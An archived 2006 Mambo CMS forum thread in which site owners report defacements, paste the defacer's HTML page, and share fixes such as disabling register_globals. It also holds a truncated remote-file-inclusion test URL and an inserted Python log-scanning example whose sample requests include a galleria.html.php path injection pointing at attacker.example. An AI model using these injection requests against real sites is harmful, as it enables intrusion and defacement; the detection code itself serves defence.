Mambo Forums (closed for posting) > Mambo 4.5.5 - Stable > Security & Performance
Old July 5th, 2006, 14:30   #1
Saladir
 
Join Date: Jul 2006
Posts: 4
Mambo Hacked?!?

Hello,

Today my site was hacked twice! The file index.html in the root directory was changed! I updated to the latest 4.5.4 version of Mambo but it did not help at all. I also changed the passwords for my FTP account and so on.

With the second hack I had a file called index.html in my root directory!

I do not know what to do.

I hope someone else can help me here.
Old July 5th, 2006, 14:38   #2
thegent
 
Join Date: Mar 2006
Location: Johannesburg
Posts: 2,174

unzip the mambo install

copy the root files to your site to overwrite the existing ones
EXCEPT configuration.php
__________________
My Mambo www.f1za.co.za
Help us Help you. Please give all relevant information
For addons go to mamboxchange
Old July 5th, 2006, 15:20   #3
mambomod
Administrator
 
Join Date: Aug 2005
Location: Victoria, Australia
Posts: 908

Please note, these are not Mambo-specific hacks. This is a problem caused by having directories set to 777 permissions. This makes a hacker's life very easy and they can place files into those directories.

You may need to ask for help from your host in securing your website, as they may need to change the ownership of some of the directories to your FTP user. You can then look at changing directories to chmod 755 and files to chmod 644, which will mean that the web user (apache, for example) will not be able to insert or modify any files/folders. If you do need to install new components or templates etc., then you can change the necessary folder to chmod 777 for a short time and then change it back when you are finished.

The hacking of web servers seems to be on the increase and is not only happening with mambo sites.

Prevention is better than cure

Hope this helps.
__________________
Support Mambo by making a donation through paypal.
Old July 5th, 2006, 23:19   #4
Saladir
 
Join Date: Jul 2006
Posts: 4

Thanks for the help. But my directories already have permission 755 and the files 644?!? So I don't know how hackers can do something like that.

My provider said that something is wrong in the PHP code of Mambo (/components/com_galleria/galleria.html.php): there is a parameter (mosConfig_absolute_path) which allows executing one's own code on the machine.

In the post before I said that I updated Mambo to 4.5.4. And I read that there is something wrong with the emulation of register_globals in earlier versions. I also found a test (if you can call it a test) where you can check whether your site is safe. The result of the test is that my site should be safe.
Old July 6th, 2006, 00:02   #5
mambomod
Administrator
 
Join Date: Aug 2005
Location: Victoria, Australia
Posts: 908

Ahh ok. There have been quite a few attacks on Mambo sites lately where additional components have been attacked and their vulnerabilities exploited. The best thing to do is make the author of the component aware of the problem and they will usually provide a patch ASAP.

There is also a link here that should lead you in the right direction.

Hope this helps.
Old July 6th, 2006, 10:07   #6
Saladir
 
Join Date: Jul 2006
Posts: 4

Hello,

thanks for the link, but I can't read the post, because I do not understand that language.

I found the reason for the hacks!

My provider enabled the PHP variable register_globals. This is why my site was hacked. Here is a sample link, so that you can check your site.

http://www.your-site.domain/componen...nfo/injek.txt?

When a site with many things you can do is displayed, then your system can easily be hacked (I tested it myself).

What you have to do is either set register_globals to OFF or edit the PHP script (/components/com_galleria/galleria.html.php) and add the line below before the first PHP code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

After that this PHP script should be safe.
Old July 9th, 2006, 20:29   #7
Duck_Master
 
Join Date: Jul 2006
Posts: 16

I had my site hacked also, but I don't have galleria on my site. Now what happened was my configuration.php was changed. I also have the 4.5.4 version. This is what was changed.
Code:
<html>

<head>
<META NAME="Title" CONTENT="ENO7 (TURKISH HACKER)">
<META NAME="Subject" CONTENT="HACKED BY ENO7 (TURKISH)">
<META NAME="Description" CONTENT="eno7 was here, HACKED BY TURKISH HACKER ENO7">
<META NAME="Distribution" CONTENT="Global">
<META NAME="Robots" CONTENT="All">

<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>ENO7 (TURKISH HACKER)</title>
</head>

<body bgcolor="#000000">

<p>&nbsp;</p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" id="AutoNumber1" bordercolordark="#333333" bordercolor="#333333">
  <tr>
    <td>
    <p align="center"><strong>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="6">
    <a style="TEXT-DECORATION: none" href="http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,eno7/" target="_blank">
    <font color="#FFFFFF">eno7</font></a><font color="#FFFFFF"> was here</font></font><font face="Verdana, Arial, Helvetica, sans-serif" size="6" color="#FFFFFF">&nbsp;
    </font></strong></p>
    <p align="center"><strong>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="6" color="#FFFFFF">
    <span lang="en-us">&quot;Turkish</span> <span lang="en-us">Hacker&quot;</span></font></strong><p align="center">
    <strong><span lang="en-us">
    <font face="Verdana, Arial, Helvetica, sans-serif" color="#666666">Wait and 
    Watch Flash &gt;&gt;&gt;&gt;&gt;</font></span></strong><p align="center">
    <strong>
    <font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#FF0000">
    STRUGGLE FOR A WORLD WITHOUT WAR</font></strong><p align="center">
    <font face="arial, helvetica, sans-serif" size="-1" color="#FFFF00">
    <span style="background-color: #000000">Your</span><span style="background-color: #000000"> 
    click helps feed the hungry with the value of 1.1 cups of staple food.</span></font><p align="center">
    <a target="_blank" href="http://www.thehungersite.com/cgi-bin/WebObjects/CTDSites.woa/452/wo/MN4000Id000rn400t3/0.0.47.7.0.1.0.0.0.CustomContentActiveImageDisplayComponent.0.0.0">
    <img border="0" src="http://imageserv01.yss4.com/images/cache/0xf3632796437283bfc0a80a36.gif" width="244" height="47"></a></td>
    <td>
    <p align="center">
      <embed width="438" height="221" src="http://www.95034.it/public/up/coin.swf"></td>
  </tr>
  <tr>
    <td>
    <p align="center"><font size="2"><span style="background-color: #000000">
    <font color="#C0C0C0">just mail:</font></span><span style="font-weight: 700; background-color: #000000"><font color="#FFFFFF">
    </font></span><font color="#c0c0c0">
    <a style="text-decoration: none; background-color: #000000" href="mailto:leno7l@gmail.com">
    <font color="#FFFFFF">leno7l@gmail.com</font></a></font></font><span style="background-color: #000000"><font size="2" color="#FFFFFF">
    </font></span></p>
    <p align="center"><span style="background-color: #000000">
    <font color="#C0C0C0" size="2">greetz :</font><b><font color="#FFFFFF" size="1"> </font>
    </b><font size="2" color="#FFFFFF">Team-Evil 
    , </font></span>
    <font color="#FFFFFF"><span class="defaulttext">
    <span style="background-color: #000000"><font size="2">aLpTurkTegin ,</font></span></span><span style="background-color: #000000"><font size="2"> 
    iskorpitx , Metlak , </font></span>
    </font>
    <font style="font-size: 8pt; background-color: rgb(0, 0, 0);" color="#FFFFFF" face="Verdana">
    ATAKAN</font><font color="#FFFFFF"><span style="background-color: #000000"><font size="2"> 
    , </font></span>
    </font><span style="background-color: rgb(0, 0, 0);">
    <font style="font-size: 8pt;" color="#FFFFFF" face="Verdana">GençTürk ,&nbsp;
    </font></span>
    <font color="#FFFFFF"><span style="background-color: #000000"><font size="2">Byond crew , PHoeNiX , </font></span>
    </font>
    <font style="font-size: 8pt; background-color: rgb(0, 0, 0);" color="#FFFFFF" face="Verdana">
    Yusuf ,</font><font color="#FFFFFF"><span style="background-color: #000000"><font size="2"> </font></span>
    <span class="defaulttext"><span style="background-color: #000000">
    <font size="2">Eddy_BAck0o , ameer ,Pablin77 , Furtivo , PoWeRFuL</font></span></span></font></p>
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber2" bordercolorlight="#000000" bordercolordark="#000000" height="23">
      <tr>
        <td width="100%" bordercolor="#000000" bordercolorlight="#000000" bordercolordark="#000000" height="23">
        <p align="center"><span class="defaulttext">
        <span style="background-color: #000000"><font color="#FF0000">
        AYYILDIZ TIM</font></span></span></td>
      </tr>
    </table>
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber3" bordercolor="#FF0000" height="11" bordercolorlight="#000000" bordercolordark="#000000">
      <tr>
        <td width="100%" bordercolor="#000000" height="11" bordercolorlight="#000000" bordercolordark="#000000">
        <p align="center"><font color="#FF0000">DELTA SALDIRI TIMI</font></p>
        <p align="center"><font color="#FFFFFF">Üstteki sarı butana tıkladıktan 
        sonra açılan sayfadaki sponsor sitelerin herhangi birine tıklamanız 
        dünyadaki aç çocuklara yapılan yemek yardımında katkınız olmasını 
        sağlıyor.</font></td>
      </tr>
    </table>
    </td>
    <td>
    <p align="center">
      <img border="0" src="http://www.95034.it/public/up/war.jpg" width="295" height="220"></td>
  </tr>
</table>

</body>

</html>
Can anyone help with how this happened and how to avoid this again?

Thanks
Old July 9th, 2006, 20:35   #8
judesoul
 
Join Date: Sep 2005
Location: Philippines
Posts: 978

Duck... I think you need to set your configuration.php unwritable, like set it to CHMOD 644.
__________________
Pinoy Mambo'ers
"Be Honest even others will not"
Old July 9th, 2006, 20:42   #9
Duck_Master
 
Join Date: Jul 2006
Posts: 16

Quote:
Originally Posted by judesoul
Duck... I think you need to set your configuration.php unwritable, like set it to CHMOD 644.
It was set to 644 and still at 644. I uploaded the old configuration.php and checked to make sure it was 644. All the files are 644.
Old July 9th, 2006, 20:53   #10
mambomod
Administrator
 
Join Date: Aug 2005
Location: Victoria, Australia
Posts: 908

Hi,
Are you sure it was your configuration.php file changed and not an index.html file placed in your mambo directory?
Old July 9th, 2006, 20:57   #11
Duck_Master
 
Join Date: Jul 2006
Posts: 16

Quote:
Originally Posted by mambomod
Hi,
Are you sure it was your configuration.php file changed and not an index.html file placed in your mambo directory?
The above code I placed was directly from my configuration.php file and not a html file. My configuration.php was re-written.
Old July 9th, 2006, 20:59   #12
mambomod
Administrator
 
Join Date: Aug 2005
Location: Victoria, Australia
Posts: 908

Ahh ok, was just checking. Some people have had index.html files changed too.

Do you have access to the access/error logs on your server to check when the file was last accessed and written to? This may help narrow down the cause.
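Saladir's posts name the parameter involved (mosConfig_absolute_path passed to galleria.html.php under register_globals) and mambomod's post above suggests checking the access logs; the Python below is an added example, not code from the thread or from Mambo, that runs that check over Apache combined-format log lines and flags requests which set a Mambo configuration global to a remote URL. The log lines, the IP addresses and the host attacker.example are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Mambo 4.5.x configuration globals that a component file may trust when
# register_globals is on; a remote URL in one of them is the include-injection
# pattern the thread describes for galleria.html.php.
CONFIG_GLOBALS = ("mosConfig_absolute_path", "mosConfig_live_site")

# Apache "combined" format: ip, identd, user, [timestamp], "request line", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines for this example; 203.0.113.7 and attacker.example are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jul/2006:13:58:02 -0700] "GET /components/com_galleria/galleria.html.php'
    '?mosConfig_absolute_path=http://attacker.example/injek.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"',
    '198.51.100.4 - - [05/Jul/2006:14:01:10 -0700] "GET /index.php?option=com_content&task=view&id=5'
    ' HTTP/1.1" 200 12045 "-" "Mozilla/5.0"',
    # same attempt with the scheme percent-encoded; parse_qs decodes it before we compare
    '203.0.113.7 - - [05/Jul/2006:14:02:33 -0700] "GET /components/com_galleria/galleria.html.php'
    '?mosConfig_absolute_path=%68ttp%3A%2F%2Fattacker.example%2Finjek.txt HTTP/1.0" 200 5123 "-" "-"',
    'a line that is not in combined log format and is skipped',
]

def is_remote_source(value: str) -> bool:
    """True if an include path points off-host (http://, https://, ftp://)."""
    return value.strip().lower().startswith(("http://", "https://", "ftp://"))

def find_rfi_attempts(lines):
    """Return one (ip, timestamp, path, global_name, injected_url) tuple per request
    whose query string sets a Mambo config global to a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))           # request target has no scheme
        query = parse_qs(parts.query, keep_blank_values=True)
        for name, values in query.items():
            base = name.split("[", 1)[0]              # also catches mosConfig_absolute_path[]
            if base not in CONFIG_GLOBALS:
                continue
            for value in values:
                if is_remote_source(value):
                    findings.append((m.group("ip"), m.group("ts"), parts.path, base, value))
    return findings

if __name__ == "__main__":
    for ip, ts, path, name, url in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} {path} sets {name} to {url}")
```

Point the function at a real log (one line per list entry) to get the timestamps mambomod asks about, and the client addresses to compare against the FTP logs.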
Old July 9th, 2006, 20:59   #13
Duck_Master
 
Join Date: Jul 2006
Posts: 16

Here is what it looked like on my site. I did a search on the hacker and this site came up with the mambo. http://www.neolithuania.lt/
Old July 9th, 2006, 21:07   #14
mambomod
Administrator
 
Join Date: Aug 2005
Location: Victoria, Australia
Posts: 908

You may have to go through the folders of your site and check to see if you can find any files that shouldn't be there and remove them. I would sort by date and check any files that have been changed recently. I would also avoid clicking on any of the links on the hacked page your site was changed to, as they look a little nasty.

If you haven't already done so, I would get rid of your configuration.php file and replace it with a backed-up one.
Old July 9th, 2006, 21:13   #15
Duck_Master
 
Join Date: Jul 2006
Posts: 16

I am going through all my files and also my logs to determine the last time that the site was accessed on certain files. I will post them tomorrow and hope we can find a solution to avoid this from happening again and also to inform everyone what to do if it happens to them.

Thanks, admins, for your help.
Old July 9th, 2006, 22:42   #16
Saladir
 
Join Date: Jul 2006
Posts: 4

Hi Duck_Master,

Please check whether register_globals is ON or OFF. Maybe you have another plugin which has the same security hole as my galleria.

If so, please find the component and first try to update it. If nothing changed, then look into the PHP code and add the following line to the code (before anything else is done):

PHP Code:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
Saladir
Old July 10th, 2006, 07:55   #17
mindtonic
 
Join Date: Jul 2006
Posts: 1
Me Too...

I just wanted to add in that I too was hacked in the exact same manner described above. My entire configuration file was changed. I still am not back up and running...

The saddest part is that the hacker did not even read our site. If his message is to end world hunger, that is in the top three of our mission statement... I guess the point is more malicious than benevolent... (duh...)
Old July 10th, 2006, 11:11   #18
Duck_Master
 
Join Date: Jul 2006
Posts: 16

I found out how they hacked into my site, and it was pretty disturbing the access they were given from this certain file. I looked into my access log and saw a weird area that dealt with my phpBB component. Now I am running phpBB 2.0.16 on my Mambo site, and how they were able to hack in was through the download.php file. I grabbed the information that was in my log and ran it myself, and to my surprise they were able to see every file that I had on the server and able to download and upload to the server. Here is a PIC of it.

What I did was remove the download.php file at this time, and I am trying to get some response back from phpBB on this. I will not release the access on how they did it to the public but will send a PM to the admins here. If anyone else has this download.php from the phpBB forum, please remove it and get help from phpBB on this. Once I get information on this I will post it here.

Thanks Everyone!!!
Old July 10th, 2006, 13:46   #19
Deviation
 
Join Date: Jun 2006
Location: Ohio
Posts: 35

2.0.21 is the latest version of phpBB. You're a couple revisions behind.
__________________
Digital Deviation
Old July 10th, 2006, 15:33   #20
Duck_Master
 
Join Date: Jul 2006
Posts: 16

I don't know if the new phpBB has been ported for Mambo yet.